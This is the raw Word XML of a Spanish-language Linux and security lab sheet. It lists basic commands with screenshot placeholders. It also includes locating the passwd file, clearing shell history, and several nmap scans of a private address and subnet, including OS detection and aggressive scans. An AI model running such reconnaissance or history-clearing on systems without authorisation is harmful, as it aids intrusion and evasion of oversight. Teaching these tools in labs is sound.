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327AE" w14:textId="76BD1C2E" w:rsidR="000944F3" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr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1EA08478" w14:textId="28946AA9" w:rsidR="004C0AD1" w:rsidRPr="00206562" w:rsidRDefault="004C0AD1" w:rsidP="00206562">
      <w:r w:rsidRPr="004C0AD1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60CC977B" wp14:editId="23DC2B78">
            <wp:extent cx="3153215" cy="781159"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7890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233" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r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0BC0EF9C" w14:textId="03B4FBAF" w:rsidR="004C0AD1" w:rsidRPr="00206562" w:rsidRDefault="004C0AD1" w:rsidP="00206562">
      <w:r w:rsidRPr="004C0AD1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F62204C" wp14:editId="727DFAF8">
            <wp:extent cx="3829584" cy="1114581"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="244513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13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82C1" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="7D72E937">
          <v:rect id="_x0000_i1113" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="083C6DC1" w14:textId="77777777" w:rsidR="004C0AD1" w:rsidRDefault="004C0AD1" w:rsidP="00206562"/>
    <w:p w14:paraId="2A6C0F63" w14:textId="77777777" w:rsidR="004C0AD1" w:rsidRPr="00206562" w:rsidRDefault="004C0AD1" w:rsidP="00206562"/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3. Ver grupos de un usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375483AA" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>groups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5398731D" w14:textId="3F4B365C" w:rsidR="004C0AD1" w:rsidRPr="00206562" w:rsidRDefault="004C0AD1" w:rsidP="00206562">
      <w:r w:rsidRPr="004C0AD1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CF6AD81" wp14:editId="6E6AF20C">
            <wp:extent cx="3238952" cy="1143160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36413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38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00000" w:rsidP="00206562">
      <w:r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72F9BD5E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spell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56A6DEBD" w14:textId="2080403F" w:rsidR="00CB63C5" w:rsidRPr="00206562" w:rsidRDefault="00CB63C5" w:rsidP="00206562">
      <w:r w:rsidRPr="00CB63C5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="732D6DCD" wp14:editId="30DA452A">
            <wp:extent cx="3134162" cy="724001"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="52607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7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77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> alumno</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>1:seguridad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA11950" w14:textId="45004362" w:rsidR="00CB63C5" w:rsidRPr="00206562" w:rsidRDefault="00CB63C5" w:rsidP="00206562">
      <w:r w:rsidRPr="00CB63C5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3625DD38" wp14:editId="65A48648">
            <wp:extent cx="3467584" cy="762106"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="578711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1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63D4275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2460E688" w14:textId="14800BAD" w:rsidR="00CB63C5" w:rsidRPr="00206562" w:rsidRDefault="00CB63C5" w:rsidP="00CB63C5">
      <w:r w:rsidRPr="00CB63C5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F4CAC70" wp14:editId="0B800E32">
            <wp:extent cx="1733792" cy="743054"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="156785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5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5E5E79E8" w14:textId="77777777" w:rsidR="00484134" w:rsidRDefault="00484134" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE95736" w14:textId="77777777" w:rsidR="00484134" w:rsidRDefault="00484134" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B2FDE1" w14:textId="6977970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7. Permisos simbólicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC26FB7" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spell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archivo.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3303CB63" w14:textId="2CD4EFF4" w:rsidR="00484134" w:rsidRPr="00206562" w:rsidRDefault="00484134" w:rsidP="00206562">
      <w:r w:rsidRPr="00484134">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00062069" wp14:editId="06161B8A">
            <wp:extent cx="1886213" cy="724001"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="192198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8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archivo.txt copia.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EA1E51" w14:textId="4FD711E2" w:rsidR="00484134" w:rsidRPr="00206562" w:rsidRDefault="00484134" w:rsidP="00206562">
      <w:r w:rsidRPr="00484134">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08D5DB0E" wp14:editId="0F41544C">
            <wp:extent cx="2353003" cy="428685"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="929993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3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77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -r carpeta1 carpeta2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17956478" w14:textId="09AD3933" w:rsidR="00484134" w:rsidRPr="00206562" w:rsidRDefault="00484134" w:rsidP="00206562">
      <w:r w:rsidRPr="00484134">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5577FF97" wp14:editId="7795282E">
            <wp:extent cx="2200582" cy="685896"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120739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3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10. Mover </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>archivo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36BC1DF4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mv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7BC6C675" w14:textId="747AE74C" w:rsidR="00484134" w:rsidRPr="00206562" w:rsidRDefault="00484134" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00484134">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A084586" wp14:editId="1A5FE359">
            <wp:extent cx="2057687" cy="552527"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="143202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7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Default="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28134241" w14:textId="1355FBDC" w:rsidR="00CF44D1" w:rsidRPr="00206562" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:r w:rsidRPr="00CF44D1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64ABE124" wp14:editId="30E90117">
            <wp:extent cx="2048161" cy="476316"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="25302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0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493" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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477B869B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find / -name "passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC758F" w14:textId="6E9BF37B" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF44D1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FD8B49C" wp14:editId="13A2596F">
            <wp:extent cx="6840220" cy="6003290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61846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7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61D8" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRPr="00206562" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pP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7876C379" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5103F557" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C67CFC8" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3271A163" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A605984" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A90510" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1102C447" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C755B11" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07038FD3" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9F2CB7" w14:textId="77777777" w:rsidR="00CF44D1" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB73882" w14:textId="2EB13731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13. Ver procesos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF978F" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="67EC56D7" w14:textId="1D389621" w:rsidR="00CF44D1" w:rsidRPr="00206562" w:rsidRDefault="00CF44D1" w:rsidP="00206562">
      <w:r w:rsidRPr="00CF44D1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EE4203F" wp14:editId="2950F133">
            <wp:extent cx="6840220" cy="5601970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91171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5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2ED5FABD" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>kill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -9 PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1726C7BB" w14:textId="144C75FD" w:rsidR="00470734" w:rsidRPr="00206562" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:r w:rsidRPr="00470734">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5457383C" wp14:editId="41690C2A">
            <wp:extent cx="6350454" cy="2613991"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="131089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91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0361" cy="262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DAD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="4A4F5BDC">
          <v:rect id="_x0000_i1117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45AE2188" w14:textId="6BC86F45" w:rsidR="00470734" w:rsidRPr="00206562" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:r w:rsidRPr="00470734">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03619930" wp14:editId="03448397">
            <wp:extent cx="6840220" cy="871220"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="157349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2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4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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24AAF7D1" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>netstat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69F3593D" w14:textId="242DFD6D" w:rsidR="00470734" w:rsidRPr="00206562" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:r w:rsidRPr="00470734">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="135FFFF0" wp14:editId="64EA5CA6">
            <wp:extent cx="6315956" cy="1752845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62232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3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Default="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>lsof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C55E49" w14:textId="77BBC3DF" w:rsidR="00470734" w:rsidRPr="00206562" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:r w:rsidRPr="00470734">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79564B6D" wp14:editId="4B30343F">
            <wp:extent cx="6840220" cy="582295"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="172062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3E2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="475C8AE5">
          <v:rect id="_x0000_i1042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211F0F46" w:rsidR="00206562" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:t>ho</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16A3C8AF" w14:textId="2E7A1A03" w:rsidR="00470734" w:rsidRPr="00206562" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:r w:rsidRPr="00470734">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D44B1D2" wp14:editId="6F668FC4">
            <wp:extent cx="3496163" cy="638264"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="8317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146A9A04" w14:textId="77777777" w:rsidR="00470734" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8F582E" w14:textId="77777777" w:rsidR="00470734" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA585DD" w14:textId="77777777" w:rsidR="00470734" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493A1F23" w14:textId="77777777" w:rsidR="00470734" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2876CC03" w14:textId="77777777" w:rsidR="00470734" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39477B2C" w14:textId="55C95961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19. Historial de comandos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D2B2B" w14:textId="0DCEACB2" w:rsidR="00206562" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:t>istory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="093C72E4" w14:textId="2F2098E8" w:rsidR="00470734" w:rsidRPr="00206562" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:r w:rsidRPr="00470734">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1096C843" wp14:editId="038D6CDD">
            <wp:extent cx="4515480" cy="8154538"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35727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1107DF7F" w14:textId="77777777" w:rsidR="00470734" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF34B0D" w14:textId="77777777" w:rsidR="00470734" w:rsidRDefault="00470734" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48012E74" w14:textId="3C096172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20. Limpiar historial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FF3B3" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F466796" w14:textId="5340DA0F" w:rsidR="00555C21" w:rsidRPr="00206562" w:rsidRDefault="00555C21" w:rsidP="00206562">
      <w:r w:rsidRPr="00555C21">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79FA539A" wp14:editId="13663934">
            <wp:extent cx="2448267" cy="1162212"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="154290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3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13F9A181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192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA2A6D" w14:textId="1CE981A3" w:rsidR="00555C21" w:rsidRPr="00206562" w:rsidRDefault="00555C21" w:rsidP="00206562">
      <w:r w:rsidRPr="00555C21">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="451F0A34" wp14:editId="52D74B60">
            <wp:extent cx="6058746" cy="2457793"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84268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7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-p 22,80,443 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0741CF7C" w14:textId="5DE94103" w:rsidR="000E278A" w:rsidRPr="00206562" w:rsidRDefault="000E278A" w:rsidP="00206562">
      <w:r w:rsidRPr="000E278A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="586FFCBC" wp14:editId="5B3FA0AC">
            <wp:extent cx="5601482" cy="2248214"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="66728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88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DA7820C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23. Escaneo rápido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D588F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-F 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5BE723" w14:textId="75E45936" w:rsidR="000E278A" w:rsidRPr="00206562" w:rsidRDefault="000E278A" w:rsidP="00206562">
      <w:r w:rsidRPr="000E278A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="543F6BFF" wp14:editId="201EFE77">
            <wp:extent cx="5534797" cy="2476846"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="652199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9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192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461575ED" w14:textId="1239ED66" w:rsidR="00166CE1" w:rsidRPr="00206562" w:rsidRDefault="00166CE1" w:rsidP="00206562">
      <w:r w:rsidRPr="00166CE1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53552E1B" wp14:editId="05D6A9AA">
            <wp:extent cx="5496692" cy="790685"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="207012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1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192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C095C83" w14:textId="5AE83053" w:rsidR="00166CE1" w:rsidRPr="00206562" w:rsidRDefault="00166CE1" w:rsidP="00206562">
      <w:r w:rsidRPr="00166CE1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1892C05D" wp14:editId="5060E433">
            <wp:extent cx="6840220" cy="2343785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1382910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0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4D5DBA1B" w14:textId="77777777" w:rsidR="00166CE1" w:rsidRDefault="00166CE1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B73269" w14:textId="77777777" w:rsidR="00166CE1" w:rsidRDefault="00166CE1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35931954" w14:textId="77777777" w:rsidR="00166CE1" w:rsidRDefault="00166CE1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB1FF95" w14:textId="1715ACCE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26. Detección de SO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA6B611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-O 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E32A50" w14:textId="44FB1A73" w:rsidR="00166CE1" w:rsidRPr="00206562" w:rsidRDefault="00166CE1" w:rsidP="00206562">
      <w:r w:rsidRPr="00166CE1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70328E82" wp14:editId="2E783614">
            <wp:extent cx="6840220" cy="2974340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="63375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548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5A177798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-A 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A6D26A" w14:textId="4DC444FE" w:rsidR="002A7F2B" w:rsidRPr="00206562" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:r w:rsidRPr="002A7F2B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D97A1B5" wp14:editId="6951CDC4">
            <wp:extent cx="6840220" cy="3221990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="911025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55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3571E320" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76165DC3" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2A30B5" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F7C953" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6465BBC1" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CFC7148" w14:textId="26F371E9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28. Guardar resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B92A097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192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C8882" w14:textId="06990A11" w:rsidR="002A7F2B" w:rsidRPr="00206562" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:r w:rsidRPr="002A7F2B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3823D883" wp14:editId="5235E51E">
            <wp:extent cx="5220429" cy="2448267"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1373136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67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77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ping google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A093FED" w14:textId="49184BFA" w:rsidR="002A7F2B" w:rsidRPr="00206562" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:r w:rsidRPr="002A7F2B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44278A7D" wp14:editId="0DCA07EC">
            <wp:extent cx="6840220" cy="2416175"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="162938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6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57A3F4A7" w14:textId="77777777" w:rsidR="002A7F2B" w:rsidRDefault="002A7F2B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
